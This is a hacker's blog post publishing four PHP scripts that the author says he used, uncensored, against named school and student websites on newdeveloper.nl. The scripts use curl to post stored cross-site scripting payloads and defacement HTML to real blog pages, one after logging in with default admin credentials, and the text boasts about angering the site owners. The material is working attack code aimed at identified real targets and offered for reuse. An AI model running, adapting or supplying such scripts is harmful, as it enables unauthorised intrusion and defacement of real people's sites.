Exploit codes used against Landstede

Hey G33ks,
So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes :)
It were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, password etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:



Exploit 1 - April 24 2017


Authentication is a luxury?
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://aberg.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */

  // Build our message
  $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

  // Initialize our Curl instance
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

  // Add our message to the POST body
  curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);

  // Execute the request
  // Then end the script
  curl_exec ($ch);
  curl_close ($ch);
  echo "Exploit send!";  


Exploit 2 - May 1 2017


Using username `admin` and password `test` is generally not a good idea on a website facing the whole world...
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://aberg.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */ 
  // Build our message
  $message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

  // Initialize our Curl request
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_VERBOSE, true);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  curl_setopt($ch, CURLOPT_HEADER, true);

  // Use memory for our cookie
  curl_setopt($ch, CURLOPT_COOKIEFILE, '-');

  // Set the username and password
  curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");

  // Add our headers
  curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Host: aberg.newdeveloper.nl',
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
    'Accept: */*',
    'Accept-Language: en-us,en;q=0.5',
    'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
    'Connection: keep-alive'
  ));

  // Authenticate outselves
  $result = curl_exec ($ch);

  // Get our response headers
  $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
  $header = substr($result, 0, $header_size);

  // Set a new url option
  curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");

  // Post our own message
  curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
  curl_exec ($ch);

  // Clean up
  curl_close ($ch);
  echo "Exploit send!";  


Exploit 3 - May 4 2017


This guy trashtalked that I wouldn't be able to exploit his site, well, it worked anyways (hint: he got pissed) :)
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://cschotman.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */

  // Build our message
  $message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
  $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
  
  // Build some POST data
  $postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);

  // Initialize a new Curl instance
  $ch = curl_init();

  // Set some options
  curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

  // Add our POST data
  curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);

  // Send the request
  // Then close our handler
  $result = curl_exec($ch);
  curl_close ($ch);

  // Dump the result
  print_r($result);  


Exploit 5 - May 4 2017 (same as Exploit #1, but against different target)


How was this one even possible?
I already exploited a site using the same mistake...
This one got them really mad btw :mrgreen:
<?php
  /*
   * Exploit by FinlayDaG33k
   * https://pmetz.newdeveloper.nl/pages/blog.php 
   *
   * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
   * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
   * As long as you retain this notice you can do whatever you want with this stuff. 
   * If we meet some day, you should buy me a drink.
   * Hugs are mandatory when meeting me!
   * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
   */
   
   // Build our message
   $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
   $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');

   // Initialize a Curl instance
   $ch = curl_init();

   // Set some options
   curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

   // Add our message
   curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);

   // Execute the request
   // Then clean up
   curl_exec ($ch);
   curl_close ($ch);
   echo "Exploit send!";  


Well, there ya have it :)
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now...
[g33kout]

Comments


Leave a comment


Please login to leave comment!